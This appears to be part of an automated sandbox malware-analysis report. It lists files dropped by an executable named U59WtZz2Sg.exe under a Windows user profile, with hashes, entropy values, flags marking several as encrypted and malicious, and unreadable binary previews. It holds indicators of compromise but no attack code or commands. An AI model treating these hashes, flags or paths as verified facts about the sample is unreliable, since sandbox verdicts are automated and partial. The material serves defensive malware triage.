Encrypted:	false
SSDEEP:	192:IdS43KPnJPnKUWgpXtZTV/FT43r3CVRkKSq:N4UKqPZZoCVRf
MD5:	8BE33E13903F96C2FB121ED6F06EF1CC
SHA1:	DD75638DADA33BA6091BAC9D12F84136136B73BA
SHA-256:	E1EB3B417D60CACE0D1F03D0CFDF22A81EC0E930A87486F91F4BA563F9C5A467
SHA-512:	C487BA3541F1DD102AD6BE6BDB072688D406CC5057CC35FBCF0953E93CE788212985699A5E851F2F19CA5EDF5D856E0F45637E88FA107B5FD25CA41B8EC36C95
Malicious:	false
Reputation:	unknown
Preview:	.PNG..WF...V.6.u....K.QZ+...z.....;$.G.O;....p...m.vp..EY4X..yO.._...7/..pa)...T.J..gW.,..,.0..u.....+v..R.J..?.C/.P...E.`.o.GC.o..e..X.=.La>..."..\.m.oWJC...U.....L...%.....J8W..Qo Y.4q..0.Q.....Y.r..E,.;5.~..[.$F....#.....w&Kb.....fn..?DxR..?..O.I.......`.>.X.....#....?PG}............6.F..a2..G.6./t].-.] ...ru+[..li.!K.....D.....bG.0z..J....g6..._...dX.f..._]....{..Xp...A...7....G......T..7....#;......h. k[....55G].....:......B....?..E......$e..'....[f....B<]...j...)....C.5t..:..q.w.......I.>.G&.\|.H....l.....\|.k..Z.....Vi2..s..:D.-.(.M.=....P..<..lH.Gh..U...I.d...uN.d<....F...]..JxH.J!..\|]1..^3yI.l\|:...5&&!..i.......}2cI.....V..[....x........#.....&u.....C...4.-b.lf..v..y..,8..v0.$.}.....=...S.>.F ..e-."3...=0.xw.....H. .U..X\|U.....~...o.P..,....A.&.pT{.......K}....n."e.....i.aKQJB)I....U.Kh8._i.k$6-y......o.xm.)..V...-...B..AI.....[[..K{...TPo.....3.5.....3Lq.`.;..PCWBUK.x....e@,,Nv...w...M..'.A]rS..... .!..+.X....2ps$.t.[..yf.E.W.

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_27_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.97621566324291
Encrypted:	false
SSDEEP:	192:yY4Uos3M7uCL+TrEQ3HNGiun/YUMjlXdrr/X6oQ:y/UbJC8EQ3HYI7ZQ
MD5:	9AEEA43EB1B1D21DC5E3E85AB5CEB5D1
SHA1:	A2E218A27C5F4641F0CC441BCB3E3B9D98F1BE3D
SHA-256:	0B3C9903C12404F1661C950F0C689C01C911A5B1A34C7A815D56C5F7042FE29C
SHA-512:	5B8653A75A51963DF2AD07B6589F9BD66A6C4785284C04ECC8368FA9626AE3C0D0DB61C0961DD641B615A5ED0FA0BE0E629CBF98FD76CEFE4BD3887907055D4B
Malicious:	false
Reputation:	unknown
Preview:	.PNG..`...0E6..t...1.I...m..d.e'...[.U..O..AcV-.....D..3.%.9.&..TFQ.[.$...'.....r=..ZE<...z..w...t.......f...[..........?V68.]?1..O.lOp.Ge(.-.h.{k..........~.X...%.4.<..AX#g<..@ds..P.4.t..sN\|~u.&].....>..p-.Sw..#....j..2=d.....vY.o.....~.P.j.[.?D~,...f<.r...La..-A!V..[.=.;.9.3:....y.f.wuj...............J!.q@>]%....`\|.C{...x....Z...=%...O...A.`...S...E.........~A.o....5.D!n\|X......Ui.......:.M..\...v...y....9..L.p1;.....\.......?%.6..8.J.....o.k..&.3}.H..dD..:...]..z0.!:.Vm>.@.P..:..b.....n....W}..w.`......0(!...F.."2_z.....iq..;.Y.1U..l..S....e.G.]xJ.....5s2y\.Z\X....W..' ....=^...q.~.....F...D....f...uf.."...es..rdM.s..M.....O.\..q..tWA5...S.;..8..y.C.Um..Iz....G%.C^.3?...P.Ri.?...-......0....k....> (u.y..Y.BGU......oWv.)..J.vH..}...z.e..!..dx&..T..Q.f.1.....D.d{....w...yB....C.r.V.J...".7....I.....Y..}Je{..}qK....F.u.y,...EBP.....7].....k.^.D\|.9...n6J.J .~8q'.oz.o...X.sOf7Ps.?.M..:Nv.p...."+...+.{x..&.....9!..y`..SZ.8...S..4..l..zU

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_37_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.973445880751033
Encrypted:	false
SSDEEP:	192:0JrLuijMLyay/9Qspo5OnUk2HOqe0Q0AseCCkV:oLuijMLya89ppoAnU+2QSecV
MD5:	3A3170B09A78EE265AF7DCDE17143DDB
SHA1:	36AB422687823EFB82978A88CF45DD6DAA8123B8
SHA-256:	3D5FF36BA8726D4283B416C35BB9574BB890E090DC00C3D23847042B205C7B09
SHA-512:	3EE2931D397E46D6B4B4B69B9A3F4AF74AC4FC4DC40C29A7D37177CB82476DCF4DE45532133459351A2020434594E5A0F4125D2F3B6F905B2F34F89ABE997172
Malicious:	false
Reputation:	unknown
Preview:	.PNG.. .U.cw9b...".ch........l'i...6..'f.JM}...bw........w...0(.S..%.....:Zw...U....S......<,,I...q..d...R.l.-....B`S......~.U..'hN2l..T.Gx.M~q-.&.AA.6...P#.FX...H....V.w.........\'.%..:$!.:..R.#k{".a.........K04....s/b..XL...X.W.....f54.M..^..O-.y=.aD..!.u.az..W.^?.Y...6.3.0.2..t....H..b.,G.+...z....i....O..x]..w....M...a.....+.~...P.r.S6....qe#..P...xyi...f!.......QQ...pJ...9JS..EW........{<.[6.....h.}..0iB.;.#ZJ.l..@.-..iU.&A.O..m.3..*<...\|.xg...C...y...zD.j=..wm.....m....r....Xv.BE}...,0.w+....7......F..r..O......nU.ou..................!..k..4....H".:.\},1....{.0....[.d..QVIq%5+!3s1....Si.\|.~.h.G.6...!...x..:].....B...Z..u...B..Q..(\|..YNmw ({......F..Y.q.....KmSV=I@.#\|.or..t.@o.....;y@\|..O....GS..a...r.....>..tJv........l.+f...6."kw.t...bi`......;........7.fx. k7smd.z.'..Y....9....KV:.n.Fpb.a.......:....)I...l...v...9=i.......B.....>.......#m.F.5.....v.....ie..P..........f=.U.H.83../..v..I2Yj..q.r......s59..d.I~..p`...^.TM\..

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_38_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.9774385967595896
Encrypted:	false
SSDEEP:	96:84q429SqdGJr1Dt38QBfbk8RrMvynseDuSpr72HnrSrV8LYUxaMTQziJoCVH597v:l/Hvjfbk8ViVSpr72mrVKYIh1vN40r
MD5:	00B94224CFE6C4A21E9E9B39113569D6
SHA1:	7BE8B062AB2AF94EE5ED05A8FDC948275C8DEACD
SHA-256:	231394537189C5BF17A126E43BB3771BD8A2AFD36367D9165EF20D5171DBEEB3
SHA-512:	78D6D97BB25A8BC4DD0D56B31EADDA17D8AD90A6155C541ED0D0418441E682E2295555B1F8E479C79D99050CE8A1B89FC849BB594D347E698E1D43629E088E4C
Malicious:	false
Reputation:	unknown
Preview:	.PNG..l..W....&..lSs.\|......\|.....XO..T..f8.%C2tJ&'...s..^.4......q............u..p...<..p.....F....V......E...(...8.C.<...ee6...Z..l....T..V....mv...'. ...=...@....r.6Fu..h..x.s.F.Yg.....Y.....7...Y..p<H..........H....W,...Y).K.sQfeOz1....4..I.......y.n.MO..K;.E..}.........LN.2D<.N...u....<...C..\|w.h..l.Pe.L.Mr....J.uzk..s..Nm.k.{..D1{.Ri......._...Y....N[.c...@...?.uc.K..[`..Fl/.k6.....8...u..d...8..".c.q.91A)..b......p.~.B.....[..F..c...\|I..&...[..1ZZ....G...D.$..;...;...6..V.O........F.0.GE...8.........fW.\.....L......J...W.3.3.b.C.N..a8$..........,z.....s.s ...#<.....6.........i..}....g.M!.......>N.....(.G......]....mchTj...].....T...^...-.].W.,.d.p.h..........4..M..9.7_...//.(.?..r..]A...w.V......\bom.T/S;f#d.=3.a..e.I.>.......d.x.V...C..$:.6.b.B.I..6.{.6....j...c(I.m.k.\|lyK....C..Xh......_.x..+'.ho.%....^/_Cb..........s;L...o..&.S2.'..tb.......]yL.....s.!...?w('........0\Y..Z.s.\|...=.C......@..L...AO.....'&....6...v.]%.+Cw.

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_43_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.9755467510754245
Encrypted:	false
SSDEEP:	192:jJ6D2DxwpcnqYUrKoRERYdlb8AW42MZwNP7bqpznx46xPgno/Y:jJRwpcqLRYYxPOJqpzn3SnoQ
MD5:	43700553F8993896FE3D2D320A0FB7FA
SHA1:	FEA7B96F3504992E1DD9565414B86112AFD47FC1
SHA-256:	4DF30BA440BF223A4976319D070579D1B9E22FE8A63B73DC72459521C2207207
SHA-512:	D151D22ACE4FF94B36C604413432586B0A44E42980CEE095DA1C371DE519845E3761E620ECDFFE45BB225290223DE8F56BF84616CDE5A2B9C3BF76184D89BD59
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....U.....MlH.M..Eq/.wQ!<.L.....k.I...!........bE].g..h.S.U......E..T$Q.(.#B=eG.a.L$.....>.U....y..+.(.9.*.$p.8.Y....\_..[..j.t5.CN.6..>B..9D< .\.2.7..G..M...W}..4e..I`..h.]...)U....o....c.q.....^l.!..Jf..3.........>....zw9y...6n....u..J......-.v........oTVU..T..os+.Q2...+....W..d>[...0[.b:.lnS2...~.#a......-..u..\|,.C.4G<...%...E....y./u.]V...Z..?I~........iXF...6r...n.g.5N....@7...P..z;.$.:y...>.\.....PA..?.O...7M.]...).jx...4Z.,.Av_7dv..}......)....7...s<.l...t..e-.{@..U...P\.S.W.....s..E.uPi......s:.. .[..<.#X...{..x.}..$.8-.o.CY../>.7.......j..w..Gi..)......%.Y<...K/..M.)i..G..;MX\|.{.\|..Bw..@.(\|0w.~..f..H...U...^.B.Q..B..f...1.gn_.S.....!..y&.:.k..R.....-.=1.k.w.....$.&D...9.]j>..........C'.8.\|DF....8..H.P.).v.+.MZn...n..5.i..b.Z...<3..!=h.!'....s.)...E...W.=wdN.H...r...5..P..+......&K.I.\|...+N....$............0R..d..[e.T...gY...>.F;.`.L)7W.$ie....uD ...xC..Ep.j...~zx}f..&.-...I...\..";.`E.{R....K....\|....we?.V.3t.M.."...G

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_9_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.969620128704524
Encrypted:	false
SSDEEP:	192:pkfnCQ6iP3BB1ySSN7H7CgIgM8stB3aZyCCfolnhD:KCQ6iPxB1yz7H7CgI5/GNdD
MD5:	E2E8B80EB9496D52A6391F9523082566
SHA1:	716ED373D5C740594ED2266EF6E9420B896B1C4A
SHA-256:	4F1E7B8C99205A704D3EEB223CAE248C625B80DC8FDB09CD1CEB3CDBFC1FF176
SHA-512:	6CE9EDF8DB54AD7EA06ECE34E2C862EFC47F09BF8363B546E2DE833E08B3457E8314DB62FE5BDA24E59DD11C6B73BBF5E3767F6472F3CC64E85F492D64E24363
Malicious:	false
Reputation:	unknown
Preview:	.PNG..N)...c.N....I.3.&....L.....8;..Q.....T,..BZ.+=.v..1.2u^.b...+r....;..W...`....j.@..w5..(`......BJ.,H..k.w..Q<\....\|....)....D...#.#.t...bxfl..m.LX...+.........c1pY....g....s.6.(...K.".d'...M.......p>nKm.^Au.7$.+.6.>..>d ...'.z(H.<x.}.-......."..L....1...U,7.8.c..F.:.@..k..<.n./i+.8......m...:.#v.9..E.$........r..kV%o.4.QWi..s...E..sh-\|..}@...#.CD...7......s..).\|K.Twu5...Cn8Y9..Er6.1}.....a..1Z..`...g.......k....C.D.rSr.7{.On.nH....9.vC^F......(....E.ZXS&....Z...~7.p.+:H4.&...?...c.'........h..M@.UNS.gr\|.f.1d....]l.4l.q..N....H..OX.J......5v...&...W....r.a.5.@..Wlx6i[.y..Z.r...r#vU.....@..+V.$7h.X...<....F].....p...R....^.Ua..L......\|>..X0km..a..qo8..)....9e..q.....b>..,.....B...P?.n.(7.#. .A..]..........V.,.@...X..=.B..F....k.u...+.+V.+~..e.j.{..6Y)..-O.G....3... ,~..g.`.t.~&[...l..S.3.4.tO.......7@...`....g.......@\......M...j........2u...My...h.1TN..z.3a....g1...M7...$.Lj...2.B...Q9"sZ...l..Mm5n....A<.,....(

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9888760477778975
Encrypted:	false
SSDEEP:	384:EknWdz/Dk8RiEniFJMhkxwlqEGJuxdVA5NwVE2jf:EkWdD1RvniYQwCUx/0wqE
MD5:	D204054E8D0AA42A766C6DC44F32BF96
SHA1:	16F550CD66D1E2D0BC700D8243034002117B8BA1
SHA-256:	BBC85EC37C4E2D12473A0C03EE7088F565D66355A7D441EEA4B6087A7B16D751
SHA-512:	60B339B388F6445B02C6365457CE5B2A667E14507FDB53D6B05F67534D5952ADA76AD59BAE757ED19F972C9FB87351786DBAAE50EAB26101E30EBD5CB7F76268
Malicious:	false
Reputation:	unknown
Preview:	.... .pl......?.k.......4a7..(#c.Q.}..'5A/..['J...u..~..U....-..X.oM..8...0........O.A.97.n5.D..@....#W..tD...f..6j...$w.>.......?!....5n.9....e...>....}h.[.sS.....wo2!..i.J.)k.c..vt........M..]>L.e.!.@4.).@..\.I..vh..l..K..Y.....g4..2..nG..3r@C..S/.#....`..,.86k.nNB.Z.e.@o..].I..r$.......X..z6p..F..o..S.1Wf....j@5^...Q.W...4.y..4-)YZ...\|.~..;(.....<..Cv.4..vkb.2.........U`..Y.-..h..'.z.....'...O.\|.y.._.-.,2...W.e.u....\|.....6....c...p.>.i./ RH.U.lJ.Fo...sJ..{&}..jUH.........-m8u;...s.qK....V...@G...8~N...,T...hr.....@h<............i....$.V.O.c....k...[4./.".c.....^.....V:..X...r{.....l....&.g..:.<#..C...u.....a..D....0.)4.b.W...t(.j'8'et...`...`..)y`7.[.6. ....b+.'..X.:.;^...~_.....ilnC...=...n..........q.7..l.....W.>w...@".\..h....I.E w...XD`..Q...f..w!....e...B...j.K...Z=...(9.a..N......L..cz.....N....P...E.A5I..... SB..'D.....O.....1....}.zw\|k&.j...\...........(.........*?..h.4w..._k.....,x.Q..4.tkR.........Q./X...W...h ........dvBM.t

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9899360186716715
Encrypted:	false
SSDEEP:	384:QcvMSm4ViuzOzW6UL/YxatE8G22lyx6nEYuyA5UySQ+Q6i:QcW4VKzW6UL/Yx2BX2wx6naLl6i
MD5:	24BDC8F8B20B6A4DB3383F0D4A736E7A
SHA1:	B885D954E16F90AC43A263FFD56946078C52F139
SHA-256:	4BC847DC336FDD38239904B8253CEBBBD4D163E9E8C3959457ED1D812A4198D4
SHA-512:	73770E6DC1A3A2028463ECB641E3F13984347A0E3CD774C316F3011FE2A0DAE655FED99B2BCE1C5D2DFB81AF8AED46FA733A2C1D904D30DB42756FBC5013B43B
Malicious:	false
Reputation:	unknown
Preview:	....`.<.;.cl.H..:Ul..@.G...}.......j......_.m....W..Q..;..\|Z..2......E.:K.-.d2'.,5X....s......_.....+..z...B%.g.......a..l;.m..u...HF.)...X!...o;s8C,)k.y.B....b..3...B..P..;Q.P..#Z..Y.{K..).s..;<..vp.o....i..j2l.;.\|.fl2K.J..... .lK.^....].............c.1l..c.._.cx...JJ......s.y.g.B%X...5..D....&...&.S.....9.i.7.>D1..D..k.=-.o.4.a}.H.p.b.1a...fv..P..C"..v.}._.kI.Y...."..O.Z5Yf._...j..j..sK..A$.t......U)+.j...vVf..\{.......1s...i..g.w.z...he.?&...B..8s.d.kw.3J-.x.x.Hf.A......t.....~.G...z.o....(0.Q0.........0.Y..a&.8.....i(9../....R.d....\0vC.'..D.3.m.L..')C.v9..Z{r%..6...).<..E...L}.mOu.+.a..e...9..h.X...Z..:.~d..0....}..y@z`.DG.a.6g.i.Z9.RT?k.....!....U&lu...h?.^..+TK.P..cF,.}[.q....^8ES`....C......s._qx....@i.K.[..y..y;Y.`.y..P.P$..d\.7.D.f..WR..P2...Z..I,.d1.#.^..?.G(._2/2B....g..^.S9..........%U.&.g.(..T..p.w..t4!...,..P...z +.N..7...JkC....r.....5..$;.....O.....Hf..q..=.$Rw.p+.F.1.o.\|........<.\|.\...`..f..%~E...WF..[.3.A=...../....(.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0A0496DA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	419734
Entropy (8bit):	6.3341112064882195
Encrypted:	false
SSDEEP:	6144:hJWtHBwqbak01gnPE/8kbZmQjli+z4b8ahQdcFFcWAF3niI+oA0O:+HHak01gMUkbRjli+wOcFFcW43iobO
MD5:	7A0A1E00BCA7241782820774C4411F78
SHA1:	6B845CDA1F117A225DE2ED7013C14BC0B7719C16
SHA-256:	E53CCCAFB0609BA523D4E86148491C9BB41F28DF303F7FEFF90F811A9A9552F5
SHA-512:	920636AB19F3C4AF0C0215D278E0DC36D2DDE0090F29E97A22AC4F2E588A6205B28F10F2C61A6AFD31EA535950B2D69B3201FC569AB9EF9D2703D874FBA6B402
Malicious:	false
Reputation:	unknown
Preview:	%f.. ...G..0...<.LE....c...w3.r.j..A..d.M.3...:uS...G...3E..skf.A...Z(........sY.JF....?D.<..n.S.Z&..'fv.....3fh.8f....\|8........K...m.ZB.......{~..:+.Vl.+..~zq..uCgF.o....E..dWCY.l...K....J%.... JeP..P..a9..0.;...09....C..\..t...x ,...#&....p1/..L;8..{4. .Ch...Xu.5C..._...d....n...E.....N..8u........[.......f.A.. k..+&..g..X...-i..[..}.t>M..ElJ..D".\|..r<.l.xzl.......O..f_.7p(.Y..xcn....\|..y..=....#..X...).RH#. ...Z.v.C.;.........9......R..<...hZ...TW.....&{7..Y.X.~..G..G....!.6.iI...b..Z........\..^U.>....e..92....D.....a....nD.C.gy.C.........W.D...n.........s..=i.l....A.<m..M2.Ml ...z..'..wn..L..D[..%.M;-_P. ...:j.UW....>...VM."3..?..}...QF..~a.8.....v..^.10......+....6..lDq....H..u.6U..c~ .b'`......P\|(.'..s"........j.w..'.Y...{.iv.....s.........O.}......S.}........J.d>u.0?.K.9I;G........k...2....w%.[C...Z.E.......X..Kr..%<..cC.F.L.:2. ....*+.W1$..@.8g.....n..a..y.....p.Cr".../%..1.(j\v..g...$.a74m.D.or.74......6...p.X.....c.NA.v...j.to.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	109822
Entropy (8bit):	7.998401839867957
Encrypted:	true
SSDEEP:	3072:jUfS8Glrrhn4QrQYvjZRKCSSbg1p2/63Q/refm/F:wXWrQ2ZRKnSN/d/re8F
MD5:	8C1F92652A3B37EB10ABBB184B257050
SHA1:	48A245DB59CB51A4E1545926C73BD1AF8F867366
SHA-256:	68D06EC48BA4BCECC50C80E8284FDC61E66C216044D4AE084A676A0801C46145
SHA-512:	FDCAEA6346E2A286DD4E9A09DE61FF4B1D6C6E8ECC14F8539739C4AF585CFF68AD67A888D81A336926DCB56DFEF3A805CD51D391C8CC1EFCB20B408A620282FE
Malicious:	true
Reputation:	unknown
Preview:	....h.h.ep........v.....>....\|..]5.."....j.v;S3v/.............jb...^....)T.(.I60...z...7..?.....%...-....@.~s.M..1.......OT.U.(..._DX.W.9.s..AW.iP.x_...}..P...".v.....$... `....;G.ye...n!f..Eji2..B.3.5k".\|PAB..1........L"...y....G.QD....p...e...{'....h..5.../s)Te...K..2v.mj.m.#.(".$.y._...G,E... `..j$C.<Rt......F.l.?..3.9...............t3D.7.Fr.K.......,(.O.o..^....T .Z.Q...?.....agO.......1=..E...[w......5f........q....RI?FLv6+`...F...N.W6S!{ZD.Zd.b..:....ijP..Y..cZeZ~VWj..?.2..8.T...!O.........3..\|....\|."/..Mc8...Fk.... ......&.Y...wU.e..7n.X..$..3..a.....a$J7..nd./..... ELo...C..K.....bI.h/.i.d.......v...:.(.-......9......?X.I...Xx.A...VS...S.^...Ic........l.x6"..g.....l.r2+6...~...l.}..[...H..Q.gM.....F.b...f...$x\|]QX..6.7..\|....k..A^..@E...u..q.K.).NF.fB4..;.7.>...=.\|t....C?..!......0..~zE....A..[.-....}...I...x.......5&bZ..o ..'`..(.........v...C.R...Z..'.?.{}..];....4 .W.D.G,.<...k...Zm..60.....2..j.w..........>.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	105686
Entropy (8bit):	7.998431706610238
Encrypted:	true
SSDEEP:	3072:KpWconEjtHcWKU76lHarcaNtxDHFdOIbZ72:REZ87U+ScaNtxDFdnZ72
MD5:	3CAFF7A171CAB7EA02E5395AF7D4DD68
SHA1:	775D24754094DB17CB79653BB3EE46A9B2B1DC9B
SHA-256:	CBE7705666F94CA9C7CCBE0DB1415A1B0DEBEDBEAD719ADB34A873272DD5BB25
SHA-512:	743DF037A2DA673479D7B6C593922A28A5517A13C053E2C0A479DA04E0D8B681E72F47FBB8F4FFE1A3AE0FED257D4D675C4511A737A3F285C4657DFD97209D82
Malicious:	true
Reputation:	unknown
Preview:	....h....=.^...../...qI...`~..<Bz.w@3..q=r$.t.N.q....;...2...'.7..O.....TMW.f.}.d>.t.2..Wr.FIb.).b.J.,..?j#.P..%..B. ..TJ..6....u.s.D:(.,.i........V.~.....S.G.....+..h..=9.q..=..wk ..u..x}tY..z.V..r.T...8'g.0o."#_(.x."D..w..7.......8.........B.U.c.D.;[.&.3..m....#..>..._.....?{i)..m1@..B.d.Pt..;...<..b...p...,r.H.#.....f2j./..d%.X..m.W.....rJ.g.2.2.....Qm.y...G.Q<.$H....c....k.a....q.rK.PLL..s.d8.p.....'...fd(c..:...@_...dcs .-....m.^..~...u...$.%..k.O.9..U.......L..+wb.{K.....W.A.K..@..I. .... V8.....r..TT.Y2..a....ML.#a.K..M....^.m...l.F.......:.....$[..4...\|!.l....'..4..K...M...FO....V.9..u..1n).DY..Bk......5A.w.d..F~.9OwD....#.=..t.}...9..x@_...6..1.,.......K.s....e.jY~..U.HQ.....Xg..W5jud...f..z[.......KN^m..@V>...e.VQ....-..'].I\|.cq........&...)...2'6...W^.U..R.../...H..lMi....V u../......f..Z..Nf7.O6J.~....6..H.I.i......H....N.m.....].q+.OHs.......R&.-...5.....]..N9e..Vy..6....D..i...P...*....)......$.q..RF.......uC....b8^'N.....J#.1gz

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	106102
Entropy (8bit):	7.998213295632806
Encrypted:	true
SSDEEP:	1536:kMb7nzH8YBBVDzegGa0d77ThPOvhrX4oUJnFDBXLTNvrY1r/8nXLltkVStiJmBo0:5bzHD+ThotXvSnFDBX/NEWRtkVSWVW68
MD5:	A685AF1F4C0A939905CB1E62F6091597
SHA1:	C028833DD7A55DA2D31781413A93BABA2BC39A31
SHA-256:	E9D11FFA21FBC4F924F80E097DB7C80E350AA727B3F7050BAF54916F0CBE4577
SHA-512:	CE7AEAF09D085FF792D3F856BBEF7C5A0BA0A018A549261CE4A342B8E35F7DC7C95B1C7DAD11C6FFF40CA87A017B407ADCD463544B2BE99FC0DC6D59B4ACDCC0
Malicious:	true
Reputation:	unknown
Preview:	.....d...l.{...............t....j9X....1_...d....<......AI..c.q...(.Jzp..J....T....R....JJ.'.-.0^..R...E..n.Wx...~..B..?...E_.YC.6....KEI7!T.."0].a..^7.4..J.#..D#.;Rr...0.6"$.Uh..6a....u.E[=..xs#X.!4.k...VxX..u.3..L..Q.0."...b.2._..n.....{g..3.......P.H..I..&......d..\..Uv......$F......K.v......../%.U..v..=wK..8....m...._9.5g."w....'.\.^k.....H..t..\|ax....8=D.f..^..Fl...L..ow...5sp..87EP! ..................S:.0..."..l.C.....+.n.p\|/.LH....3B.^....ZR..\|.Z.j.z.j..9J...e..x,..T.$..k.C..x.....`..2....B.L#............$..K~ah.w..........%...........e.6..#._S.L;s.M"x#...;m]...........p.n..\|rp.qs..D{a..B.)..l.{'G~............0........j...}E...t..!....+D}J...<..6.:.......p6.^F.7.s...\.R.~.R.R.O...a..j...`...v..._."m.+bR......w..9...e.4?..z....Au3.WG...{..CHd.o.I......h.z.\....C.1..?.......~......D.2..1s....4p.q`T..yh.G.....(...Z^.xw.j8[g....!PC{..W..\.._.p..dJ...VB.Y?}....&......f.o......w..z.........~#...... .zML..,..`../.../..........P......).5..[.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	111334
Entropy (8bit):	7.998316189307929
Encrypted:	true
SSDEEP:	3072:8164a5ZxkcCtOVXAQVUBccnQ14Z6B5b/eJb9xQLspqaa:8164I6PtOVDVmHQu6TjebSaa
MD5:	D95D3283CE7C6357536AA560FB5BB317
SHA1:	61E032767070CCD5AA2D2A84E2D5A7EE6508BE58
SHA-256:	5FD6B6CD0CC692541677917E4382009E28B719C4DC719320422FE04B9E865AB3
SHA-512:	7198CA21B0EFC6FEC30DBC4812DBB8BAFF74B54866AA556996AE3E7F2DCF6F49D2DC6C4F7F87E4AF0C01FB51CC1FE5B98B445BCCCB9CA4EC8E1B3EC47FDEE661
Malicious:	true
Reputation:	unknown
Preview:	.....y?.=..H.....t..G.>...w...t..h.JH....L..+........)A...Y.z....G...A.{>+M...EA...P.5uN\...B...s...d.~....X.#...V..l.v.nH.. ).....#.W...t....l..:...(B.'....S9.........w.1..:..j.B...!U.)I9S.o..........]<l.5.....a.$...W,..{...@.....n.&.(.V.Y.rRE..E..mE.:.`...1.c.....@.y..Z].F..or.2..Z?h....2r"C.B.5.S.....#.7..p.9a....yB....8.]..JB..W...O'.tj.2.....Q.............m_.r.).EI..O1.C9a...jW4.p...o...a.B...L....)o......S.x...B...5I.....T.gS?.A.!%.....M/.Af......(.,......k.......?...f.5 wd.%....7.;K.`.bD.`\|.M8....WC....R..1P.S.G8.W...9T...=e1.........:..R...(%.c...6...j.9..\n.>x1......y-.dF..Q..BK..*.......f..t...q........Ff.af{.....zh....lmyO(.2.....}...,8.#4........t0..\|J......u..ZUs..).7......F..AJ.,\.....~.).E....g.`_.X?V>........x#..g#fN..............k.Kgv....A9..pM..'.... ..1y..f..Z...Pc...L..)(^.@o._..6.F.:....".uQ.4.W.y....f............u\|.p..(7$~...6%9.CSXj..?.2N..,..;..".t.&N..Nc..}..#k.@[I.Oh:!.......@._{Hb.9....42.n._a.f..r..z...O/..!X.G.i./.4Z

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	459086
Entropy (8bit):	6.025652433148498
Encrypted:	false
SSDEEP:	3072:UIkC1Fr3OzhtMvKOEbVzuX3bJS+f8TedeeQIUSO3C/4Y4MRR6wG8pCYvVE/+OiJY:Xvr+lUKzZcdkosIUS7wYReACY/ewcJd
MD5:	CFD813FAF808A46C443B4C1A4BBBD9EC
SHA1:	06FA63FD5DC562E5D263BC71274B9DF0FCAD04FB
SHA-256:	0CFFD6C30205113DAFC9D621C797EAC1C6C0CD9169CC70457F681F003011054F
SHA-512:	3C28FF132BB0A0761B572BDE407E12CBDA8E24FA2681B13BEE6B2A3315A48A32D609083DB5BC576294C62FF986F42AE385F3CA8919CCF491C79EE73DB568EB45
Malicious:	false
Reputation:	unknown
Preview:	. ...c.&........".4r.H.`...Od.(r.,..$KN...z`8..J.G....)!....W.>Iu[C..H&..8\|m.9.?..3......}:.c..]....6U.....1..Ny6Hb.M.!...kO..0._..U.OSI.Q.x,.z....q.... .r\|.w7..<agcS..6..kT..$...6Z.vC^.L.........o...1.cVM....'m.#.....9.<Z....\|\|..zv^}....O...~p..:..n\|.Z.b...........k0...!.oUO..u...%B.!.FD._.@zg^....-...* _.=..........8I......s.W_.h7J~#.a.......[Y....]N..g.5..w...=..,.../.kA6_....V.k..&...b.u4..h.(...n...i._..)....Uad...K.QB5#......;..s.SW....C3....[......F.c... .3.d....4..h.,S.....d..v....r`bx....j....z.C.A..!...#n.#...'.kq.k.0..;..J....m=(.(..V3?..G...RQ.n......rD?.......(L.PI....=.../.H..?..r..jmZ.Ols...I....}.upP.'g ..g?....\|.P..z.f.{.....(..PP..c..t.... 